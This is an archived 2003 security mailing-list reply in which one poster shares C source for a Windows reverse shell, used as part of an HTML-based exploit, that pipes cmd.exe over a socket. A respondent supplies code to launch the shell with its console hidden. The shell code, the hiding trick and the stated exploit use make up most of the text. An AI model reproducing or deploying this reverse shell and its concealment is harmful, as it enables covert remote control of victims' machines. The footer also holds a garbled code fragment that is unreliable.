Re: freeconsole()

From: sk (sk@scan-associates.net)
Date: 02/28/03

Next message: jes@bitland.net: "Security contact for Bank Of America"

Previous message: Rory Savage: "Re: Non registering shell"
In reply to: Mike Mires: "freeconsole()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "sk" <sk@scan-associates.net>
To: "Mike Mires" <poc_sploit@hotmail.com>, <vuln-dev@securityfocus.com>
Date: Fri, 28 Feb 2003 10:50:12 +0800

You may want to try:

si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
FreeConsole();
CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);

To make sure the the newly created process starts with SW_HIDE.

sk
----- Original Message -----
From: "Mike Mires" <poc_sploit@hotmail.com>
To: <pentest@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>
Sent: Wednesday, February 26, 2003 6:25 PM
Subject: freeconsole()

> Hi all,
>
> I am using a basic reverse shell written in C as part of an html based
> exploit recently revealed by malware.com. it uses WSAStartup() and
> CreateProcess(). I'm looking for a way to hide the console created by
> CreateProcess. I've tried freeconsole() with no params as suggested by
some
> sources, however this does not work.
>
> Any ideas would be appreciated.
>
> Thanks
>
> P.S. code i'm using is
>
>
> #include <winsock2.h>
> #include <stdio.h>
> #include <windows.h>
> #pragma comment(lib,"ws2_32")
>
>
>
> void main(int argc, char *argv[])
> {
> // FreeConsole();
>
>
> WSADATA wsaData;
> SOCKET hSocket;
> STARTUPINFO si;
> PROCESS_INFORMATION pi;
>
> struct sockaddr_in adik_sin;
> memset(&adik_sin,0,sizeof(adik_sin));
> memset(&si,0,sizeof(si));
> WSAStartup(MAKEWORD(2,0),&wsaData);
> hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
> adik_sin.sin_family = AF_INET;
> adik_sin.sin_port = htons(55);
> adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
> connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
> si.cb = sizeof(si);
> si.dwFlags = STARTF_USESTDHANDLES;
> si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
>
> CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
>
>
>
> ExitProcess(0);
>
> }
>
>
> _________________________________________________________________
> Overloaded with spam? With MSN 8, you can filter it out
>
http://join.msn.com/?page=features/junkmail&pgmarket=en-gb&XAPID=32&DI=1059p;   l_MessageBox( NULL, iQ

Next message: jes@bitland.net: "Security contact for Bank Of America"
Previous message: Rory Savage: "Re: Non registering shell"
In reply to: Mike Mires: "freeconsole()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]